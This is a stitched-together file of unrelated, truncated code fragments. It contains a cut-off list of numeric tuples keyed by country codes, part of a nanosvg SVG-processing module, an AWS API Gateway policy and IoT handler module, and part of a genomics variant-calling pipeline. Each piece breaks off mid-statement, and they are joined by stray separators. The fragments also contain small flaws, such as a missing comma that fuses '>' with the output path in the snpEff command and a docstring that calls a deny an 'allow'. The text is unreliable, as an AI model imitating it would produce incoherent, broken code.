('ARG', 'BRA',0.000892954631620695,0.00102671872220525,0.000752679350989002,0.000375460004988526,0.000141641810297664,0.00305127222553313,0.00466254396632122,0.00356233640118427,0.00181449450870132,0.0125586638324953,0.0191904615351148,0.0146621415638906,0.0387674449212905,0.059239196979834,0.0797810343398969,0.0820922484479786,0.12191064998252,0.0452606880069148,0.00746823779602526,0.000693166636581415,4.2926562180514e-05,0.125442336635824,0.0931437321045617,0.0958420564557137,0.0230537660119041,0.0474432426896821,0.0488176481827268,0.00285298922065415,0.00880691640033887,0.0181240961634324,0.0186491415842612,0.00022270806333958,0.000928223644040323,0.00292579180723905,0.00627522600487472,0.00952026756238919),
('ARG', | |
<gh_stars>0
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import dataclasses
from functools import reduce
from lxml import etree # pytype: disable=import-error
import re
from typing import List, Optional, Tuple
from nanosvg.svg_meta import ntos, svgns, xlinkns
from nanosvg import svg_pathops
from nanosvg.svg_types import *
import numbers
_ELEMENT_CLASSES = {
"circle": SVGCircle,
"ellipse": SVGEllipse,
"line": SVGLine,
"path": SVGPath,
"polygon": SVGPolygon,
"polyline": SVGPolyline,
"rect": SVGRect,
}
_CLASS_ELEMENTS = {v: f"{{{svgns()}}}{k}" for k, v in _ELEMENT_CLASSES.items()}
_ELEMENT_CLASSES.update({f"{{{svgns()}}}{k}": v for k, v in _ELEMENT_CLASSES.items()})
_XLINK_TEMP = "xlink_"
# How much error, as pct of viewbox max(w,h), is allowed on lossy ops
# For example, for a Noto Emoji with a viewBox 0 0 128 128 permit error of 0.128
_MAX_PCT_ERROR = 0.1
# When you have no viewbox, use this. Absolute value in svg units.
_DEFAULT_DEFAULT_TOLERENCE = 0.1
def _xlink_href_attr_name() -> str:
return f"{{{xlinkns()}}}href"
def _copy_new_nsmap(tree, nsm):
new_tree = etree.Element(tree.tag, nsmap=nsm)
new_tree.attrib.update(tree.attrib)
new_tree[:] = tree[:]
return new_tree
def _fix_xlink_ns(tree):
"""Fix xlink namespace problems.
If there are xlink temps, add namespace and fix temps.
If we declare xlink but don't use it then remove it.
"""
xlink_nsmap = {"xlink": xlinkns()}
if "xlink" in tree.nsmap and not len(
tree.xpath("//*[@xlink:href]", namespaces=xlink_nsmap)
):
# no reason to keep xlink
nsm = copy.copy(tree.nsmap)
del nsm["xlink"]
tree = _copy_new_nsmap(tree, nsm)
elif "xlink" not in tree.nsmap and len(tree.xpath(f"//*[@{_XLINK_TEMP}]")):
# declare xlink and fix temps
nsm = copy.copy(tree.nsmap)
nsm["xlink"] = xlinkns()
tree = _copy_new_nsmap(tree, nsm)
for el in tree.xpath(f"//*[@{_XLINK_TEMP}]"):
# try to retain attrib order, unexpected when they shuffle
attrs = [(k, v) for k, v in el.attrib.items()]
el.attrib.clear()
for name, value in attrs:
if name == _XLINK_TEMP:
name = _xlink_href_attr_name()
el.attrib[name] = value
return tree
def _del_attrs(el, *attr_names):
for name in attr_names:
if name in el.attrib:
del el.attrib[name]
def _attr_name(field_name):
return field_name.replace("_", "-")
def _field_name(attr_name):
return attr_name.replace("-", "_")
def from_element(el):
if el.tag not in _ELEMENT_CLASSES:
raise ValueError(f"Bad tag <{el.tag}>")
data_type = _ELEMENT_CLASSES[el.tag]
args = {
f.name: f.type(el.attrib[_attr_name(f.name)])
for f in dataclasses.fields(data_type)
if _attr_name(f.name) in el.attrib
}
return data_type(**args)
def to_element(data_obj):
el = etree.Element(_CLASS_ELEMENTS[type(data_obj)])
data = dataclasses.asdict(data_obj)
for field in dataclasses.fields(data_obj):
field_value = data[field.name]
if field_value == field.default:
continue
attrib_value = field_value
if isinstance(attrib_value, numbers.Number):
attrib_value = ntos(attrib_value)
el.attrib[_attr_name(field.name)] = attrib_value
return el
def _reset_attrs(data_obj, field_pred):
for field in dataclasses.fields(data_obj):
if field_pred(field):
setattr(data_obj, field.name, field.default)
class SVG:
svg_root: etree.Element
elements: List[Tuple[etree.Element, Tuple[SVGShape, ...]]]
def __init__(self, svg_root):
self.svg_root = svg_root
self.elements = []
def _elements(self) -> List[Tuple[etree.Element, Tuple[SVGShape, ...]]]:
if self.elements:
return self.elements
elements = []
for el in self.svg_root.iter("*"):
if el.tag not in _ELEMENT_CLASSES:
continue
elements.append((el, (from_element(el),)))
self.elements = elements
return self.elements
def _set_element(self, idx: int, el: etree.Element, shapes: Tuple[SVGShape, ...]):
self.elements[idx] = (el, shapes)
def view_box(self) -> Optional[Rect]:
raw_box = self.svg_root.attrib.get("viewBox", None)
if not raw_box:
return None
box = tuple(int(v) for v in re.split(r",|\s+", raw_box))
if len(box) != 4:
raise ValueError("Unable to parse viewBox")
return Rect(*box)
def _default_tolerance(self):
vbox = self.view_box()
# Absence of viewBox is unusual
if vbox is None:
return _DEFAULT_DEFAULT_TOLERENCE
return min(vbox.w, vbox.h) * _MAX_PCT_ERROR / 100
@property
def tolerance(self):
return self._default_tolerance()
def shapes(self):
return tuple(shape for (_, shapes) in self._elements() for shape in shapes)
def absolute(self, inplace=False):
"""Converts all basic shapes to their equivalent path."""
if not inplace:
svg = SVG(copy.deepcopy(self.svg_root))
svg.absolute(inplace=True)
return svg
swaps = []
for idx, (el, (shape,)) in enumerate(self._elements()):
self.elements[idx] = (el, (shape.absolute(),))
return self
def shapes_to_paths(self, inplace=False):
"""Converts all basic shapes to their equivalent path."""
if not inplace:
svg = SVG(copy.deepcopy(self.svg_root))
svg.shapes_to_paths(inplace=True)
return svg
tolerance = self.tolerance
swaps = []
for idx, (el, (shape,)) in enumerate(self._elements()):
self.elements[idx] = (el, (shape.as_path(tolerance),))
return self
def _xpath(self, xpath, el=None):
if el is None:
el = self.svg_root
return el.xpath(xpath, namespaces={"svg": svgns()})
def _xpath_one(self, xpath):
els = self._xpath(xpath)
if len(els) != 1:
raise ValueError(f"Need exactly 1 match for {xpath}, got {len(els)}")
return els[0]
def resolve_url(self, url, el_tag):
match = re.match(r"^url[(]#([\w-]+)[)]$", url)
if not match:
raise ValueError(f'Unrecognized url "{url}"')
return self._xpath_one(f'//svg:{el_tag}[@id="{match.group(1)}"]')
def _resolve_use(self, scope_el):
attrib_not_copied = {"x", "y", "width", "height", _xlink_href_attr_name()}
swaps = []
for use_el in self._xpath(".//svg:use", el=scope_el):
ref = use_el.attrib.get(_xlink_href_attr_name(), "")
if not ref.startswith("#"):
raise ValueError("Only use #fragment supported")
target = self._xpath_one(f'//svg:*[@id="{ref[1:]}"]')
new_el = copy.deepcopy(target)
group = etree.Element("g")
use_x = use_el.attrib.get("x", 0)
use_y = use_el.attrib.get("y", 0)
if use_x != 0 or use_y != 0:
group.attrib["transform"] = (
group.attrib.get("transform", "") + f" translate({use_x}, {use_y})"
).strip()
for attr_name in use_el.attrib:
if attr_name in attrib_not_copied:
continue
group.attrib[attr_name] = use_el.attrib[attr_name]
if len(group.attrib):
group.append(new_el)
swaps.append((use_el, group))
else:
swaps.append((use_el, new_el))
for old_el, new_el in swaps:
old_el.getparent().replace(old_el, new_el)
def resolve_use(self, inplace=False):
"""Instantiate reused elements.
https://www.w3.org/TR/SVG11/struct.html#UseElement"""
if not inplace:
svg = SVG(copy.deepcopy(self.svg_root))
svg.resolve_use(inplace=True)
return svg
self._update_etree()
self._resolve_use(self.svg_root)
return self
def _resolve_clip_path(self, clip_path_url):
clip_path_el = self.resolve_url(clip_path_url, "clipPath")
self._resolve_use(clip_path_el)
self._ungroup(clip_path_el)
# union all the shapes under the clipPath
# Fails if there are any non-shapes under clipPath
clip_path = svg_pathops.union(
self.tolerance, *[from_element(e) for e in clip_path_el]
)
return clip_path
def _combine_clip_paths(self, clip_paths):
# multiple clip paths leave behind their intersection
if len(clip_paths) > 1:
return svg_pathops.intersection(self.tolerance, *clip_paths)
elif clip_paths:
return clip_paths[0]
return None
def _new_id(self, tag, template):
for i in range(100):
potential_id = template % i
existing = self._xpath(f'//svg:{tag}[@id="{potential_id}"]')
if not existing:
return potential_id
raise ValueError(f"No free id for {template}")
def _inherit_group_attrib(self, group, child):
def _inherit_copy(attrib, child, attr_name):
child.attrib[attr_name] = child.attrib.get(attr_name, attrib[attr_name])
def _inherit_multiply(attrib, child, attr_name):
value = float(attrib[attr_name])
value *= float(child.attrib.get(attr_name, 1.0))
child.attrib[attr_name] = ntos(value)
def _inherit_clip_path(attrib, child, attr_name):
clips = sorted(
child.attrib.get("clip-path", "").split(",") + [attrib.get("clip-path")]
)
child.attrib["clip-path"] = ",".join([c for c in clips if c])
attrib_handlers = {
"fill": _inherit_copy,
"stroke": _inherit_copy,
"stroke-width": _inherit_copy,
"stroke-linecap": _inherit_copy,
"stroke-linejoin": _inherit_copy,
"stroke-miterlimit": _inherit_copy,
"stroke-dasharray": _inherit_copy,
"fill-opacity": _inherit_multiply,
"opacity": _inherit_multiply,
"clip-path": _inherit_clip_path,
}
attrib = copy.deepcopy(group.attrib)
for attr_name in sorted(attrib.keys()):
if not attr_name in attrib_handlers:
continue
attrib_handlers[attr_name](attrib, child, attr_name)
del attrib[attr_name]
if attrib:
raise ValueError(f"Unable to process group attrib {attrib}")
def _ungroup(self, scope_el):
"""Push inherited attributes from group down, then remove the group.
If result has multiple clip paths merge them.
"""
groups = [e for e in self._xpath(f".//svg:g", scope_el)]
multi_clips = []
for group in groups:
# move groups children up
for child in group:
group.remove(child)
group.addnext(child)
self._inherit_group_attrib(group, child)
if "," in child.attrib.get("clip-path", ""):
multi_clips.append(child)
# nuke the groups
for group in groups:
if group.getparent() is not None:
group.getparent().remove(group)
# if we have new combinations of clip paths materialize them
new_clip_paths = {}
old_clip_paths = []
for clipped_el in multi_clips:
clip_refs = clipped_el.attrib["clip-path"]
if clip_refs not in new_clip_paths:
clip_ref_urls = clip_refs.split(",")
old_clip_paths.extend(
[self.resolve_url(ref, "clipPath") for ref in clip_ref_urls]
)
clip_paths = [self._resolve_clip_path(ref) for ref in clip_ref_urls]
clip_path = self._combine_clip_paths(clip_paths)
new_el = etree.SubElement(self.svg_root, "clipPath")
new_el.attrib["id"] = self._new_id("clipPath", "merged-clip-%d")
new_el.append(to_element(clip_path))
new_clip_paths[clip_refs] = new_el
new_ref_id = new_clip_paths[clip_refs].attrib["id"]
clipped_el.attrib["clip-path"] = f"url(#{new_ref_id})"
# destroy unreferenced clip paths
for old_clip_path in old_clip_paths:
if old_clip_path.getparent() is None:
continue
old_id = old_clip_path.attrib["id"]
if not self._xpath(f'//svg:*[@clip-path="url(#{old_id})"]'):
old_clip_path.getparent().remove(old_clip_path)
def _compute_clip_path(self, el):
"""Resolve clip path for element, including inherited clipping.
None if there is no clipping.
https://www.w3.org/TR/SVG11/masking.html#EstablishingANewClippingPath
"""
clip_paths = []
while el is not None:
clip_url = el.attrib.get("clip-path", None)
if clip_url:
clip_paths.append(self._resolve_clip_path(clip_url))
el = el.getparent()
return self._combine_clip_paths(clip_paths)
def ungroup(self, inplace=False):
if not inplace:
svg = SVG(copy.deepcopy(self.svg_root))
svg.ungroup(inplace=True)
return svg
self._update_etree()
self._ungroup(self.svg_root)
return self
def _stroke(self, shape):
"""Convert stroke to path.
Returns sequence of shapes in draw order. That is, result[1] should be
drawn on top of result[0], etc."""
def stroke_pred(field):
return field.name.startswith("stroke")
# map old fields to new dest
_stroke_fields = {
"stroke": "fill",
"stroke_opacity": "opacity",
}
if shape.stroke == "none":
return (shape,)
# make a new path that is the stroke
stroke = svg_pathops.stroke(shape, self.tolerance)
# convert some stroke attrs (e.g. stroke => fill)
for field in dataclasses.fields(shape):
dest_field = _stroke_fields.get(field.name, None)
if not dest_field:
continue
setattr(stroke, dest_field, getattr(shape, field.name))
| |
import json
import traceback
import boto3
from botocore.exceptions import ClientError
import re
import requests
from .exceptions import IoTBotoError, QueryError, ThingNotExists
from .utils import Logger, HttpVerb
from settings.aws import USER_POOL_ID
project_logger = Logger()
logger = project_logger.get_logger()
class Session:
def __init__(self):
self._user_session = boto3.session.Session()
self.user_region = self._user_session.region_name
class Sts(Session):
def __init__(self):
Session.__init__(self)
self._account_client = boto3.client("sts")
self.account_id = self._account_client.get_caller_identity()["Account"]
class IamAuthPolicyHandler(object):
aws_account_id = ""
"""
The AWS account id the policy will be generated for. This is used to create the method ARNs.
"""
principal_id = ""
"""
The principal used for the policy, this should be a unique identifier for the end user.
"""
version = "2012-10-17"
"""
The policy version used for the evaluation. This should always be '2012-10-17'
"""
path_regex = "^[/.a-zA-Z0-9-\*]+$"
"""
The regular expression used to validate resource paths for the policy.
"""
"""
These are the internal lists of allowed and denied methods. These are lists
of objects and each object has 2 properties: A resource ARN and a nullable
conditions statement.
The build method processes these lists and generates the approriate
statements for the final policy.
"""
allow_methods = []
deny_methods = []
rest_api_id = "*"
"""
The API Gateway API id. By default this is set to '*'
"""
region = "*"
"""
The region where the API is deployed. By default this is set to '*'
"""
stage = "*"
"""
The name of the stage used in the policy. By default this is set to '*'
"""
def __init__(self):
"""
Class that manages the creation of AWS IAM Policies for API Gateway Lambda Authorizers.
"""
"""
The AWS account id the policy will be generated for. This is used to create the method ARNs.
"""
self.aws_account_id = None
"""
The principal used for the policy, this should be a unique identifier for the end user.
"""
self.principal_id = None
"""
The policy version used for the evaluation. This should always be '2012-10-17'
"""
self.version = "2012-10-17"
"""
The regular expression used to validate resource paths for the policy.
"""
self.path_regex = "^[/.a-zA-Z0-9-\*]+$"
"""
The API Gateway API id. By default this is set to '*'
"""
self.rest_api_id = "*"
"""
The region where the API is deployed. By default this is set to '*'
"""
self.region = "*"
"""
The name of the stage used in the policy. By default this is set to '*'
"""
self.stage = "*"
"""
These are the internal lists of allowed and denied methods. These are lists
of objects and each object has 2 properties: A resource ARN and a nullable
conditions statement.
The build method processes these lists and generates the approriate
statements for the final policy.
"""
self.allow_methods = []
self.deny_methods = []
def populate(self, aws_account_id, principal_id):
self.aws_account_id = aws_account_id
self.principal_id = principal_id
def _add_method(self, effect, verb, resource, conditions):
"""Adds a method to the internal lists of allowed or denied methods. Each object in
the internal list contains a resource ARN and a condition statement. The condition
statement can be null."""
if verb != "*" and not hasattr(HttpVerb, verb):
raise NameError("Invalid HTTP verb " + verb + ". Allowed verbs in HttpVerb class")
resource_pattern = re.compile(self.path_regex)
if not resource_pattern.match(resource):
raise NameError("Invalid resource path: " + resource + ". Path should match " + self.path_regex)
if resource[:1] == "/":
resource = resource[1:]
resource_arn = (
"arn:aws:execute-api:"
+ self.region
+ ":"
+ self.aws_account_id
+ ":"
+ self.rest_api_id
+ "/"
+ self.stage
+ "/"
+ verb
+ "/"
+ resource
)
if effect.lower() == "allow":
self.allow_methods.append({"resourceArn": resource_arn, "conditions": conditions})
elif effect.lower() == "deny":
self.deny_methods.append({"resourceArn": resource_arn, "conditions": conditions})
@staticmethod
def _get_empty_statement(effect):
"""
Returns an empty statement object prepopulated with the correct action and the
desired effect.
"""
statement = {"Action": "execute-api:Invoke", "Effect": effect[:1].upper() + effect[1:].lower(), "Resource": []}
return statement
def _get_statement_for_effect(self, effect, methods):
"""T
his function loops over an array of objects containing a resourceArn and
conditions statement and generates the array of statements for the policy.
"""
statements = []
if len(methods) > 0:
statement = self._get_empty_statement(effect)
for curMethod in methods:
if curMethod["conditions"] is None or len(curMethod["conditions"]) == 0:
statement["Resource"].append(curMethod["resourceArn"])
else:
conditional_statement = self._get_empty_statement(effect)
conditional_statement["Resource"].append(curMethod["resourceArn"])
conditional_statement["Condition"] = curMethod["conditions"]
statements.append(conditional_statement)
statements.append(statement)
return statements
def allow_all_methods(self):
"""
Adds a '*' allow to the policy to authorize access to all methods of an API
"""
self._add_method("Allow", HttpVerb.ALL, "*", [])
def deny_all_methods(self):
"""
Adds a '*' allow to the policy to deny access to all methods of an API
"""
self._add_method("Deny", HttpVerb.ALL, "*", [])
def allow_method(self, verb, resource):
"""
Adds an API Gateway method (Http verb + Resource path) to the list of allowed
methods for the policy
"""
self._add_method("Allow", verb, resource, [])
def deny_method(self, verb, resource):
"""
Adds an API Gateway method (Http verb + Resource path) to the list of denied
methods for the policy
"""
self._add_method("Deny", verb, resource, [])
def allow_method_with_conditions(self, verb, resource, conditions):
"""
Adds an API Gateway method (Http verb + Resource path) to the list of allowed
methods and includes a condition for the policy statement. More on AWS policy
conditions here: http://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements.html#Condition
"""
self._add_method("Allow", verb, resource, conditions)
def deny_method_with_conditions(self, verb, resource, conditions):
"""
Adds an API Gateway method (Http verb + Resource path) to the list of denied
methods and includes a condition for the policy statement. More on AWS policy
conditions here: http://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements.html#Condition
"""
self._add_method("Deny", verb, resource, conditions)
def build(self):
"""
Generates the policy document based on the internal lists of allowed and denied
conditions. This will generate a policy with two main statements for the effect:
one statement for Allow and one statement for Deny.
Methods that includes conditions will have their own statement in the policy.
"""
if (self.allow_methods is None or len(self.allow_methods) == 0) and (
self.deny_methods is None or len(self.deny_methods) == 0
):
raise NameError("No statements defined for the policy")
policy = {"principalId": self.principal_id, "policyDocument": {"Version": self.version, "Statement": []}}
policy["policyDocument"]["Statement"].extend(self._get_statement_for_effect("Allow", self.allow_methods))
policy["policyDocument"]["Statement"].extend(self._get_statement_for_effect("Deny", self.deny_methods))
return policy
class ConfigurationHandler(Sts):
"""
Handles the boto3 calss for SSM configuration.
"""
def __init__(self, path: str):
Sts.__init__(self)
self.ssm_client = boto3.client("ssm")
self.path = path
self.configuration = None
def get_config(self):
try:
parameter_details = self.ssm_client.get_parameters_by_path(Path=self.path, Recursive=False)
logger.info(parameter_details)
if "Parameters" in parameter_details and len(parameter_details.get("Parameters")) > 0:
for param in parameter_details.get("Parameters"):
config_values = json.loads(param.get("Value"))
self.configuration = config_values
except Exception:
logger.error("Encountered an error loading config from SSM.")
logger.error(traceback.print_exc())
finally:
logger.info(self.configuration)
return self.configuration
class ThingHandler(Sts):
"""
Handles the boto3 calls for thing management. Includes Things, Thing Types, Policies, Certificates and Thing
Indexing.
"""
def __init__(self):
Sts.__init__(self)
self.iot_client = boto3.client("iot")
def attach_policy_(self, policy_name: str, certificate_arn: str):
logger.info("Attaching IoT policy...")
try:
response = self.iot_client.attach_policy(policyName=policy_name, target=certificate_arn)
except ClientError:
logger.error("Boto3 error... Unable to attach policy!")
logger.error(traceback.format_exc())
raise IoTBotoError
except Exception:
logger.error("Unexpected error...")
logger.error(traceback.format_exc())
raise RuntimeError
def attach_thing_principal_(self, thing_name: str, certificate_arn: str):
logger.info("Attaching IoT thing principal...")
try:
response = self.iot_client.attach_thing_principal(thingName=thing_name, principal=certificate_arn)
except ClientError:
logger.error("Boto3 error... Unable to attach thing to its principal!")
logger.error(traceback.format_exc())
raise IoTBotoError
except Exception:
logger.error("Unexpected error...")
logger.error(traceback.format_exc())
raise RuntimeError
def create_thing_(self, thing_name: str, thing_type: str, thing_attributes: dict):
logger.info("Creating thing...")
try:
response = self.iot_client.create_thing(
thingName=thing_name, thingTypeName=thing_type, attributePayload={"attributes": thing_attributes},
)
except ClientError:
logger.error("Boto3 error... Unable to create thing!")
logger.error(traceback.format_exc())
raise IoTBotoError
except Exception:
logger.error("Unexpected error...")
logger.error(traceback.format_exc())
raise RuntimeError
def describe_thing_(self, thing_name: str) -> dict:
logger.info("Describing thing...")
try:
response = self.iot_client.describe_thing(thingName=thing_name)
thing_data = {
"thing_arn": response["thingArn"],
"thing_name": response["thingName"],
"thing_type_name": response["thingTypeName"],
"attributes": response["attributes"],
"version": response["version"],
}
except ClientError:
logger.error("Boto3 error... Probably thing does not exist!")
raise ThingNotExists
except Exception:
logger.error("Unexpected error...")
logger.error(traceback.format_exc())
raise RuntimeError
else:
return thing_data
def get_preconfigured_policy(self, policy_name: str) -> dict:
logger.info("Getting preconfigured policy...")
try:
response = self.iot_client.get_policy(policyName=policy_name)["policyArn"]
except ClientError:
logger.error(traceback.format_exc())
raise IoTBotoError
except Exception:
logger.error("Unexpected error...")
logger.error(traceback.format_exc())
raise RuntimeError
else:
return response
@staticmethod
def get_root_ca(preferred_endpoint: str, backup_endpoint: str):
try:
r = requests.get(url=preferred_endpoint)
r.raise_for_status()
except Exception:
logger.error("Using backup certficate endpoint...")
logger.error(traceback.format_exc())
r = requests.get(url=backup_endpoint)
if r.status_code == 200:
return r.text
else:
return False
def get_thing_types_by_prefix(self, partial_name: str):
thing_types = list()
response = self.iot_client.list_thing_types(maxResults=10)
thing_types.extend(response["thingTypes"])
next_token = response.get("nextToken")
while next_token is not None:
try:
next_token = response.get("nextToken")
if next_token is None:
response = | |
call somatic variants
:param config: The configuration dictionary.
:type config: dict.
:param sample: sample name.
:type sample: str.
:param input_bam: The input_bam file name to process.
:type input_bam: str.
:returns: str -- The output vcf file name.
"""
vardict_vcf = "{}.vardict.vcf".format(name)
logfile = "{}.vardict.log".format(name)
vardict = ["{}".format(config['vardict']['bin']),
"-G",
"{}".format(config['reference']),
"-z",
"-c",
"1",
"-S",
"2",
"-E",
"3",
"-g",
"4",
"-B",
"{}".format(config['vardict']['num_cores']),
# "-a", the amplicon flag seems to be creating errors
# "-F 0", Probably don't need this as duplicates aren't marked and ignoring secondary alignment good
"-f",
"{}".format(config['min_alt_af']),
"-N",
"{}".format(name),
"-b",
"{}".format(input_bam),
"{}".format(samples[name]['regions'])]
vardict2vcf = ["{}".format(config['vardict2vcf']['bin']),
"-E",
"-f",
"{}".format(config['min_alt_af']),
"-N",
"{}".format(name)]
vcfsort = ["{}".format(config['vcftools_sort']['bin']),
"-c"]
command = ("{vardict} | {strandbias} | {vardict2vcf} | "
"{sort} > {vcf}".format(vardict=" ".join(vardict), strandbias=config['vardict_strandbias']['bin'],
vardict2vcf=" ".join(vardict2vcf), sort=" ".join(vcfsort), vcf=vardict_vcf))
job.fileStore.logToMaster("VarDict Command: {}\n".format(command))
run_and_log_command(command, logfile)
return vardict_vcf
def run_pindel(job, config, name, input_bam):
"""Run Pindel caller for InDel Detection
:param config: The configuration dictionary.
:type config: dict.
:param name: sample name.
:type name: str..
:param input_bam: The input_bam file name to process.
:type input_bam: str.
:returns: str -- The output vcf file name.
"""
pindel_config = "{}.pindel_config.txt".format(name)
output_dir = "{}_pindel".format(name)
output_vcf = "{}.pindel.vcf".format(name)
logfile = "{}.pindel.log".format(name)
vcf_logfile = "{}.pindel2vcf.log".format(name)
with open(pindel_config, 'w') as bam_config:
bam_config.write("%s %s %s\n" % (input_bam, config['insert_size'], name))
command = ("{}".format(config['pindel']['bin']),
"-f",
"{}".format(config['reference']),
"-c",
"ALL",
"-w",
"{}".format(config['pindel']['window']),
"-E",
"{}".format(config['pindel']['sensitivity']),
"-T",
"{}".format(config['pindel']['num_cores']),
"-o",
"{}".format(output_dir),
"-i",
"{}".format(pindel_config))
pindel2vcf_command = ("{}".format(config['pindel2vcf']['bin']),
"-r",
"{}".format(config['reference']),
"-R",
"{}".format(config['snpeff']['reference']),
"-d",
"{}".format(config['snpeff']['reference']),
"-he",
"0.01",
"-G",
"-P",
"{}".format(output_dir),
"-v",
"{}".format(output_vcf))
job.fileStore.logToMaster("Pindel Command: {}\n".format(command))
run_and_log_command(" ".join(command), logfile)
job.fileStore.logToMaster("Pindel2vcf Command: {}\n".format(pindel2vcf_command))
run_and_log_command(" ".join(pindel2vcf_command), vcf_logfile)
return output_vcf
def vt_normalization(job, config, sample, caller, input_vcf):
"""Decompose and left normalize variants
:param config: The configuration dictionary.
:type config: dict.
:param sample: sample name.
:type sample: str.
:param sample: caller name.
:type sample: str.
:param input_vcf: The input_vcf file name to process.
:type input_vcf: str.
:returns: str -- The output vcf file name.
"""
output_vcf = "{}.{}.normalized.vcf".format(sample, caller)
logfile = "{}.{}.vt_normalization.log".format(sample, caller)
normalization = ["zless",
"{}".format(input_vcf),
"|",
"sed",
"'s/ID=AD,Number=./ID=AD,Number=R/'",
"|",
"{}".format(config['vt']['bin']),
"decompose",
"-s",
"-",
"|",
"{}".format(config['vt']['bin']),
"normalize",
"-r",
"{}".format(config['reference']),
"-",
">",
"{}".format(output_vcf)]
job.fileStore.logToMaster("VT Command: {}\n".format(normalization))
run_and_log_command(" ".join(normalization), logfile)
return output_vcf
def merge_variant_calls(job, config, sample, callers, vcf_files):
"""Merge variant calls from multiple variant callers
:param config: The configuration dictionary.
:type config: dict.
:param sample: sample name.
:type sample: str.
:param callers: Comma-separated list of VCF callers to tag the ensemble output. Must be in same order as vcf_files.
:type sample: str.
:param vcf_files: List of input vcf files for merging.
:type vcf_files: list.
:returns: str -- The output vcf file name.
"""
merged_vcf = "{}.merged.vcf.gz".format(sample)
uncompressed_vcf = "{}.merged.vcf".format(sample)
sorted_vcf = "{}.merged.sorted.vcf".format(sample)
logfile1 = "{}.merging.log".format(sample)
logfile2 = "{}.uncompress-merging.log".format(sample)
logfile3 = "{}.merged_sort.log".format(sample)
vcf_files_string = " ".join(vcf_files)
command = ["{}".format(config['ensemble']['bin']),
"ensemble",
"-c",
"{}".format(config['ensemble']['num_cores']),
"--numpass",
"1",
"--names",
"{}".format(callers),
"{}".format(merged_vcf),
"{}".format(config['reference']),
"{}".format(vcf_files_string)]
command2 = ["bgzip",
"-cd",
"{}".format(merged_vcf),
">",
"{}".format(uncompressed_vcf)]
command3 = ["{}".format(config['picard']['bin']),
"SortVcf",
"SEQUENCE_DICTIONARY={}".format(config['dict']),
"OUTPUT={}".format(sorted_vcf),
"INPUT={}".format(uncompressed_vcf)]
sys.stderr.write("Running commands: \n")
sys.stderr.write("bcbio-variation-recall Command: {}\n".format(command))
sys.stderr.write("Uncompression Command: {}\n".format(command2))
sys.stderr.write("Sort Command: {}\n".format(command3))
job.fileStore.logToMaster("bcbio-variation-recall Command: {}\n".format(command))
run_and_log_command(" ".join(command), logfile1)
job.fileStore.logToMaster("Uncompression Command: {}\n".format(command2))
run_and_log_command(" ".join(command2), logfile2)
job.fileStore.logToMaster("Sort Command: {}\n".format(command3))
run_and_log_command(" ".join(command3), logfile3)
# The Index file created by Picard often causes problems with the GATK
index_file = "{}.idx".format(sorted_vcf)
os.remove(index_file)
return sorted_vcf
def annotate_vcf(job, config, name, input_vcf, input_bam):
"""Run GATK's VariantAnnotation on the specified VCF
:param config: The configuration dictionary.
:type config: dict.
:param sample: sample name.
:type sample: str.
:param input_vcf: The input_vcf file name to process.
:type input_vcf: str.
:param input_bam: The input_bam file name to process.
:type input_bam: str.
:returns: str -- The output vcf file name.
"""
output_vcf = "{}.annotated.vcf".format(name)
annotation_logfile = "{}.variantannotation.log".format(name)
annotation_command = ["{}".format(config['gatk-annotate']['bin']),
"-T",
"VariantAnnotator",
"-R",
"{}".format(config['reference']),
"-nt",
"{}".format(config['gatk-annotate']['num_cores']),
"--group",
"StandardAnnotation",
"--dbsnp",
"{}".format(config['dbsnp']),
"-I",
"{}".format(input_bam),
"--variant",
"{}".format(input_vcf),
"-L",
"{}".format(input_vcf),
"-o",
"{}".format(output_vcf)]
job.fileStore.logToMaster("GATK VariantAnnotator Command: {}\n".format(annotation_command))
run_and_log_command(" ".join(annotation_command), annotation_logfile)
return output_vcf
def filter_variants(job, config, name, input_vcf):
"""Run GATK's VariantFilter on the specified VCF
:param config: The configuration dictionary.
:type config: dict.
:param sample: sample name.
:type sample: str.
:param input_vcf: The input_vcf file name to process.
:type input_vcf: str.
:returns: str -- The output vcf file name.
"""
output_vcf = "{}.filtered.vcf".format(name)
filter_log = "{}.variantfiltration.log".format(name)
filter_command = ["{}".format(config['gatk-filter']['bin']),
"-T",
"VariantFiltration",
"-R",
"{}".format(config['reference']),
"--filterExpression",
"'MQ0 > {}'".format(config['mq0_threshold']),
"--filterName",
"'HighMQ0'",
"--filterExpression",
"'DP < {}'".format(config['coverage_threshold']),
"--filterName",
"'LowDepth'",
"--filterExpression",
"'QUAL < {}'".format(config['var_qual_threshold']),
"--filterName",
"'LowQual'",
"--filterExpression",
"'MQ < {}'".format(config['map_qual_threshold']),
"--filterName",
"'LowMappingQual'",
"--variant",
"{}".format(input_vcf),
"-o",
"{}".format(output_vcf)]
job.fileStore.logToMaster("GATK VariantFiltration Command: {}\n".format(filter_command))
run_and_log_command(" ".join(filter_command), filter_log)
return output_vcf
def snpeff(job, config, name, input_vcf):
"""Annotate the specified VCF using snpEff
:param config: The configuration dictionary.
:type config: dict.
:param sample: sample name.
:type sample: str.
:param input_vcf: The input_vcf file name to process.
:type input_vcf: str.
:returns: str -- The output vcf file name.
"""
output_vcf = "{}.snpEff.{}.vcf".format(name, config['snpeff']['reference'])
logfile = "{}.snpeff.log".format(name)
snpeff_command = ["{}".format(config['snpeff']['bin']),
"-Xmx{}g".format(config['snpeff']['max_mem']),
"-onlyTr {}".format(config['transcripts']),
"-v",
"{}".format(config['snpeff']['reference']),
"{}".format(input_vcf),
">"
"{}".format(output_vcf)]
job.fileStore.logToMaster("snpEff Command: {}\n".format(snpeff_command))
run_and_log_command(" ".join(snpeff_command), logfile)
return output_vcf
def vcfanno(job, config, name, samples, input_vcf):
"""Take the specified VCF and use vcfanno to add additional annotations
:param config: The configuration dictionary.
:type config: dict.
:param sample: sample name.
:type sample: str.
:param input_vcf: The input_vcf file name to process.
:type input_vcf: str.
:returns: str -- The output vcf file name.
"""
output_vcf = "{}.vcfanno.snpEff.{}.vcf".format(name, config['snpeff']['reference'])
logfile = "{}.vcfanno.log".format(name)
command = ["{}".format(config['vcfanno']['bin']),
"-p",
"{}".format(config['vcfanno']['num_cores']),
"--lua",
